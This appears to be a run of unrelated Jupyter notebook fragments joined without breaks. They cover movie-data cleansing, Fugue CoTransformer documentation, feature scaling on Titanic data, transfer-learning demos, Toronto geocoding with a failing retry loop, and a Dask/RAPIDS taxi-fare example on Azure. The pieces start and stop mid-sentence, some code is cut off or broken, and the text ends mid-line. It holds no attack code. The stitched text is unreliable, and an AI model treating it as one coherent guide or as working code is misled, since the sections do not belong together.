not a comprehensive list and we do not check here whether you accidentially changed the function signatures, so failing this validity check is only a sufficient condition for telling you something went wrong.for answer in [Q1, Q2, Q3, Q4, Q5, Q6, Q7, Q8, Q9, Q10, QFormulation]: assert isinstance(answer, str) for fun in [ construct_scaled_identity, mean_diagonal, bottom_right_matrix, transpose_sum, matrixvector1, matrixvector2, matrixvector3, matrixvector4, matrixvector5, fw, bw, SortBy, collapse_mr_dot, LogisticRegressionMeanPooling, add_features, accuracy, training_loop ]: assert callable(fun)Data Cleansing of the Data collected for the Best 250 Movies of All Times Calling the Necessary Librariesimport numpy as np import pandas as pd import seaborn as sns %matplotlib inline import matplotlib.pyplot as plt plt.style.use('seaborn-whitegrid')Defining the Functions Used in the Data Cleansing# The following function replaces a string by an integer if the string is purely numerical, and by NaN otherwise. def Clean_NaN(x): try: x=int(float(x)) except: x=np.nan return x # This function removes 'K' and 'M' from a string, and automatically moves the '.' to the right by the # correct number of places. def RemoveDot (string): if string[-1]=='K': x=string.replace('K','') t='000' elif string[-1]=='M': x=string.replace('M','') t='000000' else: x='Not known!' t='' a=0; b=x.find('.') if b !=-1: while x[-1]=='0': x=x.replace(x[-1],'') x=x+t for k in range(len(x)-b): if x[len(x)-k-1]=='0': a += 1 else: break y=x.replace('.','')[:a+b] + '.' + x.replace('.','')[a+b:] else: y=x+t return y # The following function takes the runtime in the format of x hours and y mintues, and replace it by total minutes. def Convert_Runtime(x): if x=='Not available!': u=np.nan else: b1=x.find('h') try: y=int(x[:b1].strip()) except: y=0 b2=x.find('m') if b2!=-1: z=int(x[b1+1:b2].strip()) else: z=0 u=y*60+z return u # The following function, takes the 'Box Office' of a movie in US dollars, and gives the equivalent amount in the # year 2020. To do the conversion, we have extracted a table (CPI index) from the website # https://www.usinflationcalculator.com/ and saved it as a txt file. The file is read by the code, and the # following function uses the content to do the conversion. def Box_Office_Conv(x,year): z=int(round(x*CPI[year-1920])) return z # The 'Outlier_Elimination' function replaces the outliers of the list x by the bound. UpLow indicates whether # the given bound is an upper or a lower bound. def Outlier_Elimination(x,bound,UpLow): if UpLow=='U': if x>bound: return bound else: return x elif UpLow=='L': if xCalling the Data from Web-scraping# 'path' indicates where to find the file we obtained from webscraping, and 'path2' is the path for the txt file # we constructed from the website https://www.usinflationcalculator.com/ for CPI index. path='/Users/masoud/Dropbox/Private/UMBC-DataScience/DATA-601/Homework-02/250-Best-Movies.csv' path2='/Users/masoud/Dropbox/Private/UMBC-DataScience/DATA-601/Homework-02/CPI-Conversion.txt' # Reading the file and storing data in 'CPIIndex'. with open(path2,'rt') as f: CPIIndex=f.readlines() Year=[] CPI=[] for k in range(101): Year.append(int(CPIIndex[k].split(',')[0].strip())) CPI.append(float(CPIIndex[k].split(',')[1].strip())) # Reading the data (i.e. the result of webscraping that was stored as a csv file in 'path') in a dataframe. df=pd.read_csv(path) # For some reason when the dataframe is read, one new unewanted column is added. In here we just get rid of that # column. df.drop(columns=['Unnamed: 0'],inplace=True)Representing the Dataframe The following dataframe has 250 rows (corresponding to the 250 Best Movies), and has 8 columns as follows:1. Movie Name: that represents the name of the movie.2. Movie Year: that represents the year movie was produced and screened.3. Movie url: that represents the electronic address of the movie in the 'rottentomatoes.com' website.4. Genre: that represents the genre of the movie.5. Runtime: that represents the length of the movie.6. Box Office: that represents the amount in US dollars the movie sold tickets in cinemas.7. Critic Ratings: that represents the average ratings by the critics of the 'rottentomatoes.com' website.8. Auidence Ratings: that represents the average ratings by all audience of the 'rottentomatoes.com' website.df.shape df.head()Cleansing the Dataframe# We define a new dataframe 'New_df'. In the new dataframe, we get rid of the spaces in the name of the columns. New_df=pd.DataFrame() New_df['Movie_Name']=df['Movie Name'] New_df['Movie_url']=df['Movie url'] New_df['Genre']=df['Genre'] New_df['Movie_Year']=df['Movie Year'].apply(int) # All columns of the old dataframe 'df' have string values. For the Box Office, we convert the value to integers # through 'Clean_NaN' function first, and then we replace all the missing values by the mean of the values of # the column 'Box Office'. New_df['Box_Office_(USD)']=df['Box Office'].apply(RemoveDot).apply(Clean_NaN) New_df['Box_Office_(USD)'].fillna(value=int(round(New_df['Box_Office_(USD)'].mean())),inplace=True) New_df['Box_Office_(USD)']=New_df['Box_Office_(USD)'].astype(int) # In order to be able to compare the Box Office values, we need to convert all of values to their equivalent values # in one year, say 2020. To do this, we take the advantage of the 'function Box_Office_Conv'. New_df['Box_Office_(USD_2020)']=New_df.apply( lambda x: Box_Office_Conv(x['Box_Office_(USD)'],x['Movie_Year']), axis=1) # We replace all the missing values in the column 'Crirtic_Ratings', and then substitute them by the mean of the # column. The values of the entries of the column are on integer type at the end of the day. New_df['Critic_Ratings']=df['Critic Ratings'].apply(Clean_NaN) New_df['Critic_Ratings'].fillna(value=round(New_df['Critic_Ratings'].mean()),inplace=True) # Similarly, we replace all the missing values in the column 'Audience_Ratings', and then substitute them by # the mean of the column. The values of the entries of the column are on integer type at the end of the day. New_df['Audience_Ratings']=df['Audience Ratings'].apply(Clean_NaN) New_df['Audience_Ratings'].fillna(value=round(New_df['Audience_Ratings'].mean()),inplace=True) # We convert the values of the column 'Runtime' to the minutes format. After the conversion, the values will have # integer type. New_df['Runtime_(min)']=df['Runtime'].apply(Convert_Runtime) New_df['Runtime_(min)'].fillna(value=round(New_df['Runtime_(min)'].mean()),inplace=True)Representing the new dataframe New_dfNew_df.head()Checking for Outliers Outliers of Box Office# The following is the box plot of the column Box Office. There seems to exist an outlier above the upper limit. # The outlier belongs to the movie 'Gone With the Wind'. We checked its boxplot against the value presented at # rottentomatoes.com, and we found that the box office value for this movie is indeed correct. So we will keep this # in our analysis. BoxPlot_Box_Office = sns.boxplot(New_df['Box_Office_(USD_2020)']) New_df.loc[New_df['Box_Office_(USD_2020)']>3500000000]Outliers of Runtime# Plotting the box plot of the Runtime column, we particularly see that there are two very lengthy movies. As we # in below, these two movies are 'The Best of Youth' and 'Satantango'. We checked the exact runtime of the two # movies, and we realized that we have the correct length of the movies in our dataframe. Therefore, we'll keep # them as they are. BoxPlot_Runtime = sns.boxplot(New_df['Runtime_(min)']) New_df.loc[New_df['Runtime_(min)']>300]Outliers of Critic Ratings# It is observed that we have a couple of low outliers for the critic ratings. We do not have an independent way # of checking the ratings. Therefore, we will replace the lower outliers by the lower fence of the box plot. BoxPlot_CRatings = sns.boxplot(New_df['Critic_Ratings']) New_df.loc[New_df['Critic_Ratings']<80] # We will substitute the lower outliers by the 'Outlier_Elimination' function we defined in HW-1. LowerBound=84 New_df.Critic_Ratings = New_df.Critic_Ratings.apply(Outlier_Elimination,args=(LowerBound,'L',)) # The new box plot for Critic Ratings shows no outliers, as expected. BoxPlot_CRatings = sns.boxplot(New_df.Critic_Ratings)Outliers of Audience Ratings# It is observed that we have a couple of low outliers for the audience ratings. We do not have an independent way # of checking the ratings. Therefore, we will replace the lower outliers by the lower fence of the box plot. BoxPlot_ARatings = sns.boxplot(New_df['Audience_Ratings']) New_df.loc[New_df['Audience_Ratings']<86] # We will substitute the lower outliers by the 'Outlier_Elimination' function we defined in HW-1. LowerBound=88 New_df.Audience_Ratings = New_df.Audience_Ratings.apply(Outlier_Elimination,args=(LowerBound,'L',)) # The new box plot for Audience Ratings shows no outliers, as expected. BoxPlot_ARatings = sns.boxplot(New_df['Audience_Ratings'])Saving the Cleansed Dataframe in a csv File# We save the cleansed dataframe to a newly defined dataframe 'New_df' as a csv file for the next step of the # process (i.e. Data Analysis) New_df.to_csv('Cleansed_Data.csv')CoTransformer`Transformer` represents the logic unit executing on arbitrary machine on a collection of partitions of the same partition keys of the input dataframes. The partitioning logic is not a concern of `CoTransformer`, it must be specified by `zip` in the previous step. You must understand [partition](partition.ipynb) and [zip](./execution_engine.ipynbZip-&-Comap)**Input can be a single** `DataFrames`**Alternatively it accepts input DataFrame types**: `LocalDataFrame`, `pd.DataFrame`, `List[List[Any]]`, `Iterable[List[Any]]`, `EmptyAwareIterable[List[Any]]`, `List[Dict[str, Any]]`, `Iterable[Dict[str, Any]]`, `EmptyAwareIterable[Dict[str, Any]]`**Output DataFrame types can be**: `LocalDataFrame`, `pd.DataFrame`, `List[List[Any]]`, `Iterable[List[Any]]`, `EmptyAwareIterable[List[Any]]`, `List[Dict[str, Any]]`, `Iterable[Dict[str, Any]]`, `EmptyAwareIterable[Dict[str, Any]]`Notice that `ArrayDataFrame` and other local dataframes can't be used as annotation, you must use `LocalDataFrame`.`CoTransformer` requires users to be explicit on the output schema. Different from `Transformer`, `*` is not allowed. Why Explicit on Output Schema?Normally computing frameworks can infer output schema, however, it is neither reliable nor efficient. To infer the schema, it has to go through at least one partition of data and figure out the possible schema. However, what if a transformer is producing inconsistent schemas on different data partitions? What if that partition takes a long time or fail? So to avoid potential correctness and performance issues, `Transformer` and `CoTransformer` output schemas are required in Fugue. Native ApproachThe simplest way, with no dependency on Fugue. You just need to have acceptable annotations on input dataframes and output. In native approach, you must specify schema in the Fugue code.from typing import Iterable, Dict, Any, List import pandas as pd def to_str(df1:List[List[Any]], df2:List[Dict[str,Any]], n=1) -> List[List[Any]]: return [[df1.__repr__(),df2.__repr__()]] from fugue import FugueWorkflow with FugueWorkflow() as dag: df1 = dag.df([[0,1],[1,3]],"a:int,b:int") df2 = dag.df([[0,4],[1,2]],"a:int,c:int") df3 = dag.df([[0,2],[1,1],[1,5]],"a:int,b:int") # with out schema hint you have to specify schema in Fugue code # must have zip, by default, zip inner joins them by their common keys df1.zip(df2).transform(to_str, schema="df1:str,df2:str").show() # if you don't want Fugue to infer the join keys, you can specify df1.zip(df3, partition={"by":"a"}).transform(to_str, schema="df1:str,df2:str").show() # you can also presort partitions df1.zip(df3, partition={"by":"a", "presort":"b DESC"}).transform(to_str, schema="df1:str,df2:str").show()With Schema HintWhen you need to reuse a cotransformer multiple times, it's tedious to specify the schema in Fugue code every time. You can instead, write a schema hint on top of the function, this doesn't require you to have Fugue dependency. The following code is doing the same thing as above but see how much shorter.from typing import Iterable, Dict, Any, List import pandas as pd #schema: df1:str,df2:str def to_str(df1:List[List[Any]], df2:List[Dict[str,Any]], n=1) -> List[List[Any]]: return [[df1.__repr__(),df2.__repr__()]] from fugue import FugueWorkflow with FugueWorkflow() as dag: df1 = dag.df([[0,1],[1,3]],"a:int,b:int") df2 = dag.df([[0,4],[1,2]],"a:int,c:int") df3 = dag.df([[0,2],[1,1],[1,5]],"a:int,b:int") df1.zip(df2).transform(to_str).show() df1.zip(df3, partition={"by":"a"}).transform(to_str).show() df1.zip(df3, partition={"by":"a", "presort":"b DESC"}).transform(to_str).show()Using DataFramesInstead of using dataframes as input, you can use a single `DataFrames` for arbitrary number of inputs.from typing import Iterable, Dict, Any, List import pandas as pd from fugue import DataFrames, FugueWorkflow #schema: res:[str] def to_str(dfs:DataFrames) -> List[List[Any]]: return [[[x.as_array().__repr__() for x in dfs.values()]]] #schema: res:[str] def to_str_with_key(dfs:DataFrames) -> List[List[Any]]: return [[[k+" "+x.as_array().__repr__() for k,x in dfs.items()]]] with FugueWorkflow() as dag: df1 = dag.df([[0,1],[1,3]],"a:int,b:int") df2 = dag.df([[0,4],[1,2]],"a:int,c:int") df3 = dag.df([[0,2],[1,1],[1,5]],"a:int,d:int") dag.zip(df1,df2,df3).transform(to_str).show() dag.zip(df1,df2,df3).transform(to_str_with_key).show() dag.zip(dict(a=df1,b=df2,c=df3)).transform(to_str_with_key).show()Decorator ApproachDecorator approach can do everything the schema hint can do, plus, it can take in a function to generate the schema.from fugue import FugueWorkflow, Schema, cotransformer from typing import Iterable, Dict, Any, List import pandas as pd # dfs is the zipped DataFrames, **params is the parameters passed in from fugue def schema_from_dfs(dfs, **params): return Schema([("_".join(df.schema.names),str) for df in dfs.values()]) @cotransformer(schema_from_dfs) def to_str(df1:List[List[Any]], df2:List[Dict[str,Any]], n=1) -> List[List[Any]]: return [[df1.__repr__(),df2.__repr__()]] with FugueWorkflow() as dag: df1 = dag.df([[0,1],[1,3]],"a:int,b:int") df2 = dag.df([[0,4],[1,2]],"a:int,c:int") df1.zip(df2).transform(to_str).show() # see the output schemaInterface ApproachAll the previous methods are just wrappers of the interface approach. They cover most of the use cases and simplify the usage. But for certain cases, you should implement interface, for example* You need partition information, such as partition keys, schema, and current values of the keys* You have an expensive but common initialization step for processing each logical partition, this should happen when initializaing physical partitionThe biggest advantage of interface approach is that you can customize pyhisical partition level initialization, and you have all the up-to-date context variables to use.In the interface approach, type annotations are not necessary, but again, it's good practice to have them.#from fugue import Transformer, FugueWorkflow, DataFrame, LocalDataFrame, PandasDataFrame from fugue import CoTransformer, FugueWorkflow, PandasDataFrame, DataFrame, ArrayDataFrame from triad.collections import Schema from time import sleep import pandas as pd import numpy as np def expensive_init(sec=5): sleep(sec) def helper(ct=20) -> pd.DataFrame: np.random.seed(0) return pd.DataFrame(np.random.randint(0,10,size=(ct, 2)), columns=list('ab')) class Median(CoTransformer): # this is invoked on driver side def get_output_schema(self, dfs): return self.key_schema + [k+":double" for k in dfs.keys()] # on initialization of the physical partition def on_init(self, df: DataFrame) -> None: expensive_init(self.params.get("sec",0)) def transform(self, dfs): result = self.cursor.key_value_array for k, v in dfs.items(): m = v.as_pandas()["b"].median() result.append(m) return ArrayDataFrame([result], self.output_schema) with FugueWorkflow() as dag: # a, b are identical because of the seed a=dag.create(helper) b=dag.create(helper) dag.zip(dict(x=a,y=b), partition={"by":["a"]}).transform(Median, params={"sec": 1}).show(rows=100)Notice a few things here:* How we access the key schema (`self.key_schema`), and current logical partition's keys as array (`self.cursor.key_value_array`)* Although DataFrames is a dict, it's an ordered dict following the input order, so you can iterate in this way* `expensive_init` is something that is a common initialization for different logical partitions, we move it to `on_init` so it will run once for each physcial partition. Output CoTransformer`OutputCoTransfomer` is in general similar to `CoTransformer`. And any `CoTransformer` can be used as `OutputCoTransformer`. It is important to understand the difference between the operations `transform` and `out_transform`* `transform` is lazy, Fugue does not ensure the compute immediately. For example, if using `SparkExecutionEngine`, the real compute of `transform` happens only when hitting an action, for example `save`.* `out_transform` is an action, Fugue ensures the compute happening immediately, regardless of what execution engine is used.* `transform` outputs a transformed dataframe for the following steps to use* `out_transform` is the last compute of a branch in the DAG, it outputs nothing.You may find that `transform().persist()` can be an alternative to `out_transform`, it's in general ok, but you must notice that, the output dataframe of a transformation can be very large, if you persist or checkpoint it, it can take up great portion of memory or disk space. In contrast, `out_transform` does not take any space. Plus, it is a more explicit way to show what you want to do.A typical use case is to distributedly compare two dataframes per partition Native Approachfrom typing import List, Any def assert_eq(df1:List[List[Any]], df2:List[List[Any]]) -> None: assert df1 == df2 print(df1,"==",df2) # schema: a:int def assert_eq_2(df1:List[List[Any]], df2:List[List[Any]]) -> List[List[Any]]: assert df1 == df2 print(df1,"==",df2) return [[0]] from fugue import FugueWorkflow with FugueWorkflow() as dag: df1 = dag.df([[0,1],[0,2],[1,3]], "a:int,b:int") df2 = dag.df([[1,3],[0,2],[0,1]], "a:int,b:int") z = df1.zip(df2, partition=dict(by=["a"],presort=["b"])) z.out_transform(assert_eq) z.out_transform(assert_eq_2) # All CoTransformer like functions/classes can be used directlyDecorator ApproachThere is no obvious advantage to use decorator for `OutputCoTransformer`from typing import List, Any from fugue.extensions import output_cotransformer from fugue import FugueWorkflow @output_cotransformer() def assert_eq(df1:List[List[Any]], df2:List[List[Any]]) -> None: assert df1 == df2 print(df1,"==",df2) with FugueWorkflow() as dag: df1 = dag.df([[0,1],[0,2],[1,3]], "a:int,b:int") df2 = dag.df([[1,3],[0,2],[0,1]], "a:int,b:int") z = df1.zip(df2, partition=dict(by=["a"],presort=["b"])) z.out_transform(assert_eq)Interface ApproachJust like the interface approach of `CoTransformer`, you get all the flexibilities and control over your transformationfrom typing import List, Any from fugue.extensions import OutputCoTransformer from fugue import FugueWorkflow class AssertEQ(OutputCoTransformer): # notice the interface is different from CoTransformer def process(self, dfs): df1, df2 = dfs[0].as_array(), dfs[1].as_array() assert df1 == df2 print(df1,"==",df2) with FugueWorkflow() as dag: df1 = dag.df([[0,1],[0,2],[1,3]], "a:int,b:int") df2 = dag.df([[1,3],[0,2],[0,1]], "a:int,b:int") z = df1.zip(df2, partition=dict(by=["a"],presort=["b"])) z.out_transform(AssertEQ)Min/Max ScalingIn min/max scaling, you subtract each value by the minimum value and then divide the result by the difference of minimum and maximum value in the dataset. To implement the min/max scaling, you can use the MinMaxScaler class from the sklearn.preprocessing module. You have to pass the Pandas dataframe containing the dataset to the fit() method of the class and then to the transorm() method of the MinMaxScaler class. The following script implements min/max scaling on the age, fare, and pclass columns of the Titanic dataset.from sklearn.preprocessing import MinMaxScaler scaler=MinMaxScaler() scaler.fit(titanic_data) scaled_data=scaler.transform(titanic_data) pd.DataFrame(scaled_data,columns=titanic_data.columns)Mean NormalizationMean normalization is very similar to min/max scaling, except in mean normalization the mean of the dataset is subtracted from each value and the result is divided by the range, i.e., the difference between the minimum and maximum values.#First finding the mean of the datasets mean_val=titanic_data.mean(axis=0) mean_val #find the range rang_vals=titanic_data.max(axis=0)-titanic_data.min(axis=0) rang_vals # applies mean normalization to the complete dataset. titanic_data_scaled=(titanic_data-mean_val)/rang_vals titanic_data_scaled plt.style.use('fivethirtyeight') sns.kdeplot(titanic_data_scaled['Age'],color='#444444')Generate some datadef sample_from_GMM(means, covariances, sizes): X = [] for i, s in enumerate(sizes): X_sample = np.random.multivariate_normal(means[i], covariances[i], s) X.append(X_sample) return np.concatenate(X) # source and target domains Xs1 = sample_from_GMM({0: [-1, -1], 1: [4, 4], 2: [-6, 8]}, {0: np.eye(2), 1: np.eye(2), 2: np.eye(2) + 2}, [400, 300, 300]) Xt1 = sample_from_GMM({0: [-3, -1], 1: [6, 7], 2: [-6, 8]}, {0: np.eye(2)+0.5, 1: np.eye(2), 2: [[1, -0.5], [-0.5, 1]]}, [400, 300, 300]) Xs2 = sample_from_GMM({0: [0, 0], 1: [0, 8]}, {0: [[1, 0.9], [0.9, 1]], 1: [[1.5, 0.25], [0.25, 1.5]]}, [400, 300]) Xt2 = sample_from_GMM({0: [2, 0], 1: [-6, 7]}, {0: [[1, -0.5], [-0.5, 1]], 1: [[1.2, 0.75], [0.75, 1.2]]}, [400, 300])Transfer algorithmsdef plot_transfer(Xs1, Xt1, Xs1_trans, Xt1_trans, Xs2, Xt2, Xs2_trans, Xt2_trans): fig, axes = plt.subplots(2, 2, figsize=(10, 10)) axes_f = axes.flatten() s_color = '#ed7811' t_color = '#0772b0' # plot first axes[0, 0].scatter(Xs1[:, 0], Xs1[:, 1], label='source', c=s_color, edgecolors='black') axes[0, 0].scatter(Xt1[:, 0], Xt1[:, 1], label='target', c=t_color, edgecolors='black') axes[0, 0].set_title('Before transfer') axes[0, 1].scatter(Xt1_trans[:, 0], Xt1_trans[:, 1], label='target', c=t_color, edgecolors='black') if len(Xs1_trans) > 0: axes[0, 1].scatter(Xs1_trans[:, 0], Xs1_trans[:, 1], label='source', c=s_color, edgecolors='black') axes[0, 1].set_title('After transfer') # plot second axes[1, 0].scatter(Xs2[:, 0], Xs2[:, 1], label='source', c=s_color, edgecolors='black') axes[1, 0].scatter(Xt2[:, 0], Xt2[:, 1], label='target', c=t_color, edgecolors='black') axes[1, 0].set_title('Before transfer') axes[1, 1].scatter(Xt2_trans[:, 0], Xt2_trans[:, 1], label='target', c=t_color, edgecolors='black') if len(Xs2_trans) > 0: axes[1, 1].scatter(Xs2_trans[:, 0], Xs2_trans[:, 1], label='source', c=s_color, edgecolors='black') axes[1, 1].set_title('After transfer') # clean up for i in range(len(axes_f)): axes_f[i].grid(alpha=0.4) axes_f[i].legend() plt.show()LocITfrom transfertools.models import LocIT # transfer with CORAL transfor = LocIT(psi=10, train_selection='random', scaling='standard') Xs1_trans, Xt1_trans = transfor.fit_transfer(Xs1, Xt1) transfor = LocIT(psi=10, train_selection='random', scaling='standard') Xs2_trans, Xt2_trans = transfor.fit_transfer(Xs2, Xt2) del transfor # plot sources and targets plot_transfer(Xs1, Xt1, Xs1_trans, Xt1_trans, Xs2, Xt2, Xs2_trans, Xt2_trans)CORALfrom transfertools.models import CORAL # transfer with CORAL transfor = CORAL(scaling='standard') Xs1_trans, Xt1_trans = transfor.fit_transfer(Xs1, Xt1) transfor = CORAL(scaling='standard') Xs2_trans, Xt2_trans = transfor.fit_transfer(Xs2, Xt2) del transfor # plot sources and targets plot_transfer(Xs1, Xt1, Xs1_trans, Xt1_trans, Xs2, Xt2, Xs2_trans, Xt2_trans)TCAfrom transfertools.models import TCA # transfer with CORAL transfor = TCA(mu=0.1, kernel_type='linear', scaling='standard') Xs1_trans, Xt1_trans = transfor.fit_transfer(Xs1, Xt1) transfor = TCA(mu=0.1, kernel_type='rbf', scaling='standard') Xs2_trans, Xt2_trans = transfor.fit_transfer(Xs2, Xt2) del transfor # plot sources and targets plot_transfer(Xs1, Xt1, Xs1_trans, Xt1_trans, Xs2, Xt2, Xs2_trans, Xt2_trans)Warning: covariate matrices not PSD. Adding regularization: 1e-06CBITfrom transfertools.models import CBIT ys1 = np.ones(len(Xs1), dtype=int) * -1 ys1[-100:] = 1 yt1 = np.ones(len(Xt1), dtype=int) * -1 yt1[-100:] = 1 # transfer with CORAL transfor = CBIT(n_clusters=20, beta=1.5) Xs1_trans, Xt1_trans = transfor.fit_transfer(Xs1, Xt1, ys1, yt1) transfor = CBIT() Xs2_trans, Xt2_trans = transfor.fit_transfer(Xs2, Xt2) del transfor # plot sources and targets plot_transfer(Xs1, Xt1, Xs1_trans, Xt1_trans, Xs2, Xt2, Xs2_trans, Xt2_trans)Gathering Latitudes and Longitudes of Neighborhoods of TorontoPreviously we have gathered the names of the neighborhoodsimport requests import pandas as pd import numpy as np df = pd.read_csv("toronto_city_guide_capstone") df.head()Geocoder kicks in :D#!pip install geocoder import geocoder # import geocoder for postalCode in df['PostalCode']: lat_lng_coords = None print(postalCode) counter = 0 while(lat_lng_coords is None): g = geocoder.google('{}, Toronto, Ontario'.format(postalCode)) lat_lng_coords = g.latlng counter = counter +1 print("at ", counter, " trial") latitude = lat_lng_coords[0] longitude = lat_lng_coords[1] df[postalCode]['Latitude'] = latitude df[postalCode]['Longitude'] = longitude print("at ", counter, " trials found: ", postalCode, " at (", latitude, " , ", longitude, ")") print("----------------------------------------------------------------") df.head()M3A at 1 trial at 2 trial at 3 trial at 4 trial at 5 trial at 6 trial at 7 trial at 8 trial at 9 trial at 10 trial at 11 trial at 12 trial at 13 trial at 14 trial at 15 trial at 16 trial at 17 trial at 18 trial at 19 trial at 20 trial at 21 trial at 22 trial at 23 trial at 24 trial at 25 trial at 26 trial at 27 trial at 28 trial at 29 trial at 30 trial at 31 trial at 32 trial at 33 trial at 34 trial at 35 trial at 36 trial at 37 trial at 38 trial at 39 trial at 40 trial at 41 trial at 42 trial at 43 trial at 44 trial at 45 trial at 46 trial at 47 trial at 48 trial at 49 trial at 50 trial at 51 trial at 52 trial at 53 trial at 54 trial at 55 trial at 56 trial at 57 trial at 58 trial at 59 trial at 60 trial at 61 trial at 62 trial at 63 trial at 64 trial at 65 trial at 66 trial at 67 trialSeems like given geocoder API does not return anything...df_given_lang_long = pd.read_csv("Geospatial_Coordinates.csv") df_given_lang_long.head() df.shape df_given_lang_long.shape for label, given_data in df_given_lang_long.iterrows(): df.loc[df['PostalCode']== given_data['Postal Code'],'Latitude'] = given_data['Latitude'] df.loc[df['PostalCode']== given_data['Postal Code'],'Longitude'] = given_data['Longitude'] df[0:21] df.to_csv("neighborhoods_with_coordinates")Multi-node multi-GPU example on Azure using dask-cloudprovider[Dask Cloud Provider](https://cloudprovider.dask.org/en/latest/) is a native cloud intergration for dask. It helps manage Dask clusters on different cloud platforms. In this notebook, we will look at how we can use the package to set-up a Azure cluster and run a multi-node, multi-GPU example with [RAPIDS](https://rapids.ai/). RAPIDS provides a suite of libraries to accelerate data science pipelines on the GPU entirely. This can be scaled to multiple nodes using Dask as we will see through this notebook. For the purposes of this demo, we will use the a part of the NYC Taxi Dataset (only the files of 2014 calendar year will be used here). The goal is to predict the fare amount for a given trip given the times and coordinates of the taxi trip. Before running the notebook, run the following commands in the terminal to setup Azure CLI```pip install azure-cliaz login```And follow the instructions on the prompt to finish setting up the account.The list of packages needed for this notebook is listed in the cell below - uncomment and run the cell to set it up.# !pip install "dask-cloudprovider[azure]" # !pip install "dask-cloudprovider[azure]" --upgrade # !pip install --upgrade azure-mgmt-network azure-mgmt-compute # !pip install gcsfs # !pip install dask_xgboost # !pip install azureml from dask.distributed import Client, wait from dask_cuda import LocalCUDACluster import dask_cudf import numpy as npAzure cluster set upLet us now setup the [Azure cluster](https://cloudprovider.dask.org/en/latest/azure.html) using `AzureVMCluster` from Dask Cloud Provider. To do this, you;ll first need to set up a Resource Group, a Virtual Network and a Security Group on Azure. [Learn more about how you can set this up](https://cloudprovider.dask.org/en/latest/azure.htmlresource-groups). Note that you can also set it up using the Azure portal directly.Once you have set it up, you can now plug in the names of the entities you have created in the cell below. Finally note that we use the RAPIDS docker image to build the VM and use the `dask_cuda.CUDAWorker` to run within the VM.location = "SOUTH CENTRAL US" resource_group = "RAPIDS-HPO-test" vnet = "dask-vnet" security_group = "test-security-group" vm_size = "Standard_NC12s_v3" docker_image = "rapidsai/rapidsai-core:cuda10.2-runtime-ubuntu18.04-py3.8" worker_class = "dask_cuda.CUDAWorker" n_workers = 2 env_vars = {"EXTRA_PIP_PACKAGES": "gcsfs"} from dask_cloudprovider.azure import AzureVMCluster cluster = AzureVMCluster( location=location, resource_group=resource_group, vnet=vnet, security_group=security_group, vm_size=vm_size, docker_image=docker_image, worker_class=worker_class, env_vars=env_vars, )Let's look at the data locally to see what we're dealing with. We will make use of the data from 2014 for the purposes of the demo. We see that there are columns for pickup and dropoff times, distance, along with latitude, longitude, etc. These are the information we'll use to estimate the trip fare amount.base_path = 'gcs://anaconda-public-data/nyc-taxi/csv/' tmp_df = dask_cudf.read_csv(base_path+'2014/yellow_tripdata_2014*.csv', n_rows=1000) tmp_df.head().to_pandas() # Let's delete the dataframe and free up some memory del tmp_dfData CleanupThe data needs to be cleaned up before it can be used in a meaningful way. We first perform a renaming of some columns to a cleaner name (for instance, some of the years have `tpep_ropoff_datetime` instead of `dropfoff_datetime`). We also define the datatypes each of the columns need to be read as.# list of column names that need to be re-mapped remap = {} remap['tpep_pickup_datetime'] = 'pickup_datetime' remap['tpep_dropoff_datetime'] = 'dropoff_datetime' remap['ratecodeid'] = 'rate_code' #create a list of columns & dtypes the df must have must_haves = { 'pickup_datetime': 'datetime64[ms]', 'dropoff_datetime': 'datetime64[ms]', 'passenger_count': 'int32', 'trip_distance': 'float32', 'pickup_longitude': 'float32', 'pickup_latitude': 'float32', 'rate_code': 'int32', 'dropoff_longitude': 'float32', 'dropoff_latitude': 'float32', 'fare_amount': 'float32' } def clean(df_part, remap, must_haves): """ This function performs the various clean up tasks for the data and returns the cleaned dataframe. """ tmp = {col:col.strip().lower() for col in list(df_part.columns)} df_part = df_part.rename(columns=tmp) # rename using the supplied mapping df_part = df_part.rename(columns=remap) # iterate through columns in this df partition for col in df_part.columns: # drop anything not in our expected list if col not in must_haves: df_part = df_part.drop(col, axis=1) continue # fixes datetime error found by and fixed by if df_part[col].dtype == 'object' and col in ['pickup_datetime', 'dropoff_datetime']: df_part[col] = df_part[col].astype('datetime64[ms]') continue # if column was read as a string, recast as float if df_part[col].dtype == 'object': df_part[col] = df_part[col].str.fillna('-1') df_part[col] = df_part[col].astype('float32') else: # downcast from 64bit to 32bit types # Tesla T4 are faster on 32bit ops if 'int' in str(df_part[col].dtype): df_part[col] = df_part[col].astype('int32') if 'float' in str(df_part[col].dtype): df_part[col] = df_part[col].astype('float32') df_part[col] = df_part[col].fillna(-1) return df_partAdd Interesting FeaturesWe'll add new features by making use of "uder defined functions" on the dataframe. We'll make use of [apply_rows](https://docs.rapids.ai/api/cudf/stable/api.htmlcudf.core.dataframe.DataFrame.apply_rows), which is similar to Pandas' apply funciton. `apply_rows` operation is [JIT compiled by numba](https://numba.pydata.org/numba-doc/dev/cuda/kernels.html) into GPU kernels. The kernels we define are - 1. Haversine distance: This is used for calculating the total trip distance.2. Day of the week: This can be useful information for determining the fare cost.`add_features` function combined the two to produce a new dataframe that has the added features.import math from math import cos, sin, asin, sqrt, pi def haversine_distance_kernel(pickup_latitude, pickup_longitude, dropoff_latitude, dropoff_longitude, h_distance): for i, (x_1, y_1, x_2, y_2) in enumerate(zip(pickup_latitude, pickup_longitude, dropoff_latitude, dropoff_longitude)): x_1 = pi/180 * x_1 y_1 = pi/180 * y_1 x_2 = pi/180 * x_2 y_2 = pi/180 * y_2 dlon = y_2 - y_1 dlat = x_2 - x_1 a = sin(dlat/2)**2 + cos(x_1) * cos(x_2) * sin(dlon/2)**2 c = 2 * asin(sqrt(a)) r = 6371 # Radius of earth in kilometers h_distance[i] = c * r def day_of_the_week_kernel(day, month, year, day_of_week): for i, (d_1, m_1, y_1) in enumerate(zip(day, month, year)): if month[i] <3: shift = month[i] else: shift = 0 Y = year[i] - (month[i] < 3) y = Y - 2000 c = 20 d = day[i] m = month[i] + shift + 1 day_of_week[i] = (d + math.floor(m*2.6) + y + (y//4) + (c//4) -2*c)%7 def add_features(df): df['hour'] = df['pickup_datetime'].dt.hour df['year'] = df['pickup_datetime'].dt.year df['month'] = df['pickup_datetime'].dt.month df['day'] = df['pickup_datetime'].dt.day df['diff'] = df['dropoff_datetime'].astype('int32') - df['pickup_datetime'].astype('int32') df['pickup_latitude_r'] = df['pickup_latitude']//.01*.01 df['pickup_longitude_r'] = df['pickup_longitude']//.01*.01 df['dropoff_latitude_r'] = df['dropoff_latitude']//.01*.01 df['dropoff_longitude_r'] = df['dropoff_longitude']//.01*.01 df = df.drop('pickup_datetime', axis=1) df = df.drop('dropoff_datetime', 